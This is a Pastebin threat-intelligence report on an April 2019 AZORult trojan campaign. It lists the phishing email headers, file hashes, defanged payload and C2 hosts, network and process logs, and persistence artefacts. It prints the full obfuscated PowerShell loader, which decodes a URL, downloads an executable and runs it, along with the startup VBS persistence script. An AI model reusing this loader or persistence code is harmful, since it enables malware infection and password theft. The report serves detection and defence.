SHARE
TWEET

#azorult_080419

VRad Apr 8th, 2019 (edited) 444 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell
  2.  
  3. https://pastebin.com/0bX17LaY
  4.  
  5. previous_contact:
  6. --------------
  7. 17/09/18    https://pastebin.com/MwwZ7DyY
  8.  
  9. FAQ:
  10. https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/
  11.  
  12. attack_vector
  13. --------------
  14. email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe
  15.  
  16. email_headers
  17. --------------
  18. Received: from jyotiimpex.co.in ([157.230.191.189])
  19.     by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
  20. Reply-To: yakupabaci@ulasvana.com
  21. From: Biju Kurian <admin@jyotiimpex.co.in>
  22. To: user00@org88.victim0.com
  23. Subject: Attached proposal #506697
  24. Date: 08 Apr 2019 10:45:51 -0700
  25.  
  26. files
  27. --------------
  28. SHA-256     71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
  29. File name   506697.gif.zip      [Zip archive data, at least v2.0 to extract]
  30. File size   624 B (624 bytes)
  31.  
  32. SHA-256     67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
  33. File name   506697.gif.lnk      [MS Windows shortcut, window=hidenormalshowminimized]
  34. File size   1.65 KB (1686 bytes)
  35.  
  36. SHA-256     f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
  37. File name   out-761452637.hta       [HTML document, ASCII text, with very long lines]
  38. File size   4.28 KB (4387 bytes)
  39.  
  40. SHA-256     3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
  41. File name   506697.gif          [PE32 executable (GUI) Intel 80386, for MS Windows]
  42. File size   674 KB (690176 bytes)
  43.  
  44. activity
  45. **************
  46.  
  47. PL_SRC:
  48.  
  49. gingerandcoblog{.} com/test/wp/out-761452637.hta    [1st, initiate]
  50.  
  51. gingerandcoblog{.} com/test/wp/506697.gif       [2nd, main file]
  52.  
  53. C2:
  54.  
  55. cubaworts{.} gq//700/index.php
  56.  
  57. Powershell
  58. "
  59. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
  60. "
  61.  
  62. netwrk
  63. --------------
  64. 67.225.197.20   gingerandcoblog{.} com  GET /test/wp/out-761452637.hta  HTTP/1.1    Mozilla/4.0
  65. 67.225.197.20   gingerandcoblog{.} com  GET /test/wp/506697.gif     HTTP/1.1    No User Agent   [!..This program must be run under Win32]
  66. 51.89.0.140 cubaworts{.} gq     POST /700/index.php         HTTP/1.1    Mozilla/4.0
  67.  
  68. comp
  69. --------------
  70. mshta.exe       3428    TCP localhost   50097   67.225.197.20   80  SYN_SENT
  71. mshta.exe       3428    TCP localhost   50098   67.225.197.20   80  ESTABLISHED
  72. powershell.exe      3244    TCP localhost   50099   67.225.197.20   80  ESTABLISHED
  73. [System]        0   TCP localhost   50100   51.89.0.140 80  TIME_WAIT
  74.  
  75. proc
  76. --------------
  77. "C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
  78. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...
  79.  
  80. C:\Users\Public\qkn.exe
  81. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
  82. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
  83.  
  84. "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
  85. C:\Windows\system32\timeout.exe  3
  86.  
  87. persist
  88. --------------
  89. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             29.03.2019 11:03   
  90. 0mbii.vbs          
  91. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs       29.03.2019 11:03   
  92.  
  93. 0mbii.vbs
  94. - - - - -
  95. "
  96. SEt wdd = CreateObjEcT("wScRipt.shelL")
  97. WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
  98. "
  99.  
  100. drop
  101. --------------
  102. C:\Users\Public\qkn.exe
  103. C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
  104. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs
  105.  
  106. # # #
  107. https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
  108. https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
  109. https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
  110. https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
  111. https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d
  112.  
  113. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top